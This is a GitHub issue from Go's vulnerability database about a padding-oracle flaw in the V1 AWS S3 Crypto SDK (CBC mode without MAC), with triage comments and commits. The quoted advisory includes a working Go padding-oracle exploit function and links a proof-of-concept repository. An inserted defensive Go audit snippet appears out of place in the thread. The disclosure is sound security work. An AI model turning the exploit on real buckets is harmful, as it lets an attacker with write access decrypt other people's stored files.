x/vulndb: potential Go vuln in github.com/aws/aws-sdk-go/service/s3/s3crypto: GHSA-f5pg-7wfw-84q9 #646

Closed
julieqiu opened this issue Aug 1, 2022 · 6 comments
julieqiu commented Aug 1, 2022

In GitHub Security Advisory GHSA-f5pg-7wfw-84q9, there is a vulnerability in the following Go packages or modules:

| Unit | Fixed | Vulnerable Ranges |
|---|---|---|
| github.com/aws/aws-sdk-go/service/s3/s3crypto | 1.34.0 | < 1.34.0 |

See doc/triage.md for instructions on how to triage this report.

packages:
  - package: github.com/aws/aws-sdk-go/service/s3/s3crypto
    versions:
      - fixed: 1.34.0
description: |-
    ### Summary

    The golang AWS S3 Crypto SDK is impacted by an issue that can result in loss of confidentiality and message forgery. The attack requires write access to the bucket in question, and that the attacker has access to an endpoint that reveals decryption failures (without revealing the plaintext) and that when encrypting the CBC option was chosen as content cipher.

    ### Risk/Severity

    The vulnerability poses insider risks/privilege escalation risks, circumventing KMS controls for stored data.

    ### Impact

    This advisory describes the plaintext revealing vulnerabilities in the golang AWS S3 Crypto SDK, with a similar issue in the non "strict" versions of C++ and Java S3 Crypto SDKs being present as well.

    V1 prior to 1.34.0 of the S3 crypto SDK allows users to encrypt files with AES-CBC, without computing a MAC on the data. Note that there is an alternative option of using AES-GCM, which is used in the examples of the documentation and not affected by this vulnerability, but by CVE-2020-8912.

    This exposes a padding oracle vulnerability: If the attacker has write access to the S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file (without observing the file contents that the endpoint learns in the process), they can reconstruct the plaintext with (on average) `128*length(plaintext)` queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors.

    This issue is fixed in V2 of the API, by disabling encryption with CBC mode for new files. Old files, if they have been encrypted with CBC mode, remain vulnerable until they are reencrypted with AES-GCM.

    ### Mitigation

    Using the version 2 of the S3 crypto SDK will not produce vulnerable files anymore. Old files remain vulnerable to this problem if they were originally encrypted with CBC mode.

    ### Proof of concept

    A [Proof of concept](https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc) is available in a separate GitHub repository.

    This particular issue is described in [padding_oracle_exploit.go](https://github.com/sophieschmieg/exploits/blob/master/aws_s3_crypto_poc/exploit/padding_oracle_exploit.go):

    ```golang
    func PaddingOracleExploit(bucket string, key string, input *OnlineAttackInput) (string, error) {
    	data, header, err := input.S3Mock.GetObjectDirect(bucket, key)
    	if alg := header.Get("X-Amz-Meta-X-Amz-Cek-Alg"); alg != "AES/CBC/PKCS5Padding" {
    		return "", fmt.Errorf("Algorithm is %q, not CBC!", alg)
    	}
    	length, err := strconv.Atoi(header.Get("X-Amz-Meta-X-Amz-Unencrypted-Content-Length"))
    	padding := byte(len(data) - length)
    	plaintext := make([]byte, length)
    	for i := length - 1; i >= 0; i-- {
    		newLength := 16 * (i/16 + 1)
    		dataCopy := make([]byte, newLength)
    		headerCopy := header.Clone()
    		copy(dataCopy, data)
    		// Set Padding
    		newPadding := byte(newLength - i)
    		for j := i + 1; j < newLength; j++ {
    			var oldValue byte
    			if j >= length {
    				oldValue = padding
    			} else {
    				oldValue = plaintext[j]
    			}
    			dataCopy, headerCopy, err = xorData(oldValue^newPadding, j, dataCopy, headerCopy)
    			if err != nil {
    				return "", err
    			}
    		}
    		// Guess
    		for c := 0; c < 256; c++ {
    			dataCopy, headerCopy, err := xorData(byte(c)^newPadding, i, dataCopy, headerCopy)
    			input.S3Mock.PutObjectDirect(bucket, key+"guess", dataCopy, headerCopy)
    			if input.Oracle(bucket, key+"guess") {
    				plaintext[i] = byte(c)
    				break
    			}
    			dataCopy, headerCopy, err = xorData(byte(c)^newPadding, i, dataCopy, headerCopy)
    		}
    	}
    	return string(plaintext), nil
    }
    ```
published: 2022-02-11T23:26:26Z
last_modified: 2022-04-19T19:02:32Z
cves:
  - CVE-2020-8911
ghsas:
  - GHSA-f5pg-7wfw-84q9
links:
    context:
      - https://github.com/advisories/GHSA-f5pg-7wfw-84q9
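As an added defensive example (not code from the advisory, the PoC repository, or the SDK): a Go audit that walks object metadata and flags objects still carrying the CBC cipher tag the advisory describes, i.e. the files that remain vulnerable until re-encrypted with the V2 client. It assumes the `X-Amz-Meta-X-Amz-Cek-Alg` header the PoC reads, assumes `AES/GCM/NoPadding` as the GCM tag value, and uses constructed metadata in place of real HEAD responses.

```go
package main

import "net/http"

// Metadata tag the V1 s3crypto client writes to record the content cipher.
// The CBC value is the one the advisory's PoC checks; the GCM value is assumed.
const (
	cekAlgHeader = "X-Amz-Meta-X-Amz-Cek-Alg"
	cbcAlg       = "AES/CBC/PKCS5Padding"
	gcmAlg       = "AES/GCM/NoPadding"
)

// ObjectMeta is the key plus the headers a HEAD request returns for one object.
type ObjectMeta struct {
	Key    string
	Header http.Header
}

// Finding names an object that should be re-encrypted with the V2 client.
type Finding struct{ Key, Alg, Reason string }

// AuditObjects flags objects still tagged AES-CBC (exposed to the padding
// oracle) and objects with no recognisable cipher tag (cannot be shown safe).
// GCM-tagged objects are treated as already migrated and are not reported.
func AuditObjects(objs []ObjectMeta) []Finding {
	var out []Finding
	for _, o := range objs {
		switch alg := o.Header.Get(cekAlgHeader); alg {
		case gcmAlg:
			// authenticated mode; nothing to do
		case cbcAlg:
			out = append(out, Finding{o.Key, alg, "AES-CBC without MAC: re-encrypt with V2 client"})
		default:
			out = append(out, Finding{o.Key, alg, "unknown or missing cipher tag: inspect manually"})
		}
	}
	return out
}

// SampleObjects is constructed metadata for a stand-alone run, not real bucket data.
func SampleObjects() []ObjectMeta {
	cbc, gcm := http.Header{}, http.Header{}
	cbc.Set(cekAlgHeader, cbcAlg)
	gcm.Set(cekAlgHeader, gcmAlg)
	return []ObjectMeta{
		{"reports/q1.csv", cbc},
		{"reports/q2.csv", gcm},
		{"legacy/notes.txt", http.Header{}}, // no cipher tag at all
	}
}
```

In practice the `ObjectMeta` slice would be filled from HEAD responses on every object in the bucket; each finding is a file to re-encrypt before the old client is retired.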

@zpavlinovic zpavlinovic removed their assignment Aug 15, 2022
@julieqiu julieqiu self-assigned this Aug 15, 2022
@gopherbot

Change https://go.dev/cl/423994 mentions this issue: data/reports: add GO-2022-0646.yaml for GHSA-f5pg-7wfw-84q9

gopherbot pushed a commit that referenced this issue Aug 15, 2022
For #646

Change-Id: Icd46b0f5a83bec71e6601ee0c8ef4251d7e10b62
Reviewed-on: https://go-review.googlesource.com/c/vulndb/+/423994
Reviewed-by: Damien Neil <dneil@google.com>
Reviewed-by: Julie Qiu <julieqiu@google.com>
@gopherbot

Change https://go.dev/cl/427335 mentions this issue: data/reports: update GO-2022-0646 to more fully cover the vulnerability

gopherbot pushed a commit that referenced this issue Sep 1, 2022
There are two separate GHSAs describing AWS S3 Crypto SDK vulnerabilities
that, while technically different, have a common underlying effect:
An attacker with write access to an S3 bucket can read files in that
bucket.

(One vulnerability allows decrypting files using AES-CBC. The other
allows converting a file using AES-GCM with the KMS option to use
AES-CBC, at which point the first vulnerability can be used to
decrypt it.)

This vulnerability is fixed in the new EncryptionClientV2 API.
Users of the old EncryptionClient API remain vulnerable, even when
using newer versions of the github.com/aws/aws-sdk-go module.

Update this report to describe the impact (attacker can decrypt
your files, but only if they have write access), the mitigation
(switch APIs), and to mark the V1 API vulnerable at all module
versions.

Fixes #635.
Fixes #646.

Change-Id: Ifd1e26119f40808977a1265f192e60fd199b1763
Reviewed-on: https://go-review.googlesource.com/c/vulndb/+/427335
TryBot-Result: Gopher Robot <gobot@golang.org>
Reviewed-by: Roland Shoemaker <roland@golang.org>
Run-TryBot: Damien Neil <dneil@google.com>
@tatianab tatianab reopened this Aug 20, 2024
@tatianab tatianab assigned tatianab and unassigned julieqiu Aug 20, 2024
@tatianab

Review for appropriate use of alias vs related

@gopherbot

Change https://go.dev/cl/629377 mentions this issue: data/reports: update GO-2022-0646

gopherbot pushed a commit that referenced this issue Nov 19, 2024
Add fixed version.

  - data/reports/GO-2022-0646.yaml

Fixes #3276
Updates #646

Change-Id: Ic76152e6070a28c0e865306ccd488061e15fb789
Reviewed-on: https://go-review.googlesource.com/c/vulndb/+/629377
Reviewed-by: Zvonimir Pavlinovic <zpavlinovic@google.com>
Auto-Submit: Tatiana Bradley <tatianabradley@google.com>
LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
@tatianab tatianab reopened this Dec 12, 2024
@gopherbot

Change https://go.dev/cl/635736 mentions this issue: data/reports: add GO-2022-0635, review GO-2022-0646

@gopherbot

Change https://go.dev/cl/635282 mentions this issue: data/reports: restore published version for GO-2022-0646

gopherbot pushed a commit that referenced this issue Dec 13, 2024
Restore historical published version that was accidentally deleted
in a previous CL. (This happened because we changed the way
we handle published times).

  - data/reports/GO-2022-0646.yaml

Updates #646

Change-Id: Ib02681c69e3b805eae705a3baffede8cc3bc358f
Reviewed-on: https://go-review.googlesource.com/c/vulndb/+/635282
Reviewed-by: Ian Cottrell <iancottrell@google.com>
LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>